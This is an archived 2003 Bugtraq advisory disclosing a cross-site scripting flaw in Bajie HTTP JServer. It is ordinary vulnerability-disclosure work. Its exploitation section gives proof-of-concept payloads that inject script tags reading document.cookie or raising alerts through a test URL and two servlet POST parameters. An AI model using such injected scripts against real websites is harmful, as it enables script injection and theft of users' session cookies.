| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 16 Oct 2003 10:55:08 +0200 (MEST)
From: "Oliver Karow" <Oliver.Karow@....de>
To: bugtraq@...urityfocus.com
Cc: gzhangx@...mail.com
Subject: CSS Vulnerability in Bajie HTTP JServer
CSS Vulnerability in Bajie HTTP JServer
==========================
Even though the cross-site-scripting vulnerability published under BID 7344
was fixed with
Built 0.95zxe1, the current version of Bajie HTTP Jserver is still
vulnerable to
cross-site-scripting attacks.
Vulnerable versions:
====================
The latest version BajieJSrv/0.95zxv4 and probably older ones.
Exploiting:
===========
The cross side scripting vulnerability can easily be demonstrated with a web
browser:
http://localhost/cgi/bin/test.txt?<script>alert(document.cookie)</script>
The following csss can be demonstrated either by inserting code into the
html-forms
with a browser,or sending via netcat a string like:
POST /servlet/custMsg?guestName=<script>alert("bang")</script> HTTP/1.0
POST
/servlet/CookieExample?cookiename=<script>alert("bang")</script>&cookievalue=&cookiepath=
HTTP/1.0
Vendor:
=======
Name: Gang Zhang (gzhangx@...mail.com)
Homepage: http://go.to/bajie
Discovered by/Credit:
=====================
16.10.2003 Oliver Karow (oliver.karow[at]gmx.de)
--
NEU FÜR ALLE - GMX MediaCenter - für Fotos, Musik, Dateien...
Fotoalbum, File Sharing, MMS, Multimedia-Gruß, GMX FotoService
Jetzt kostenlos anmelden unter http://www.gmx.net
+++ GMX - die erste Adresse für Mail, Message, More! +++
Powered by blists - more mailing lists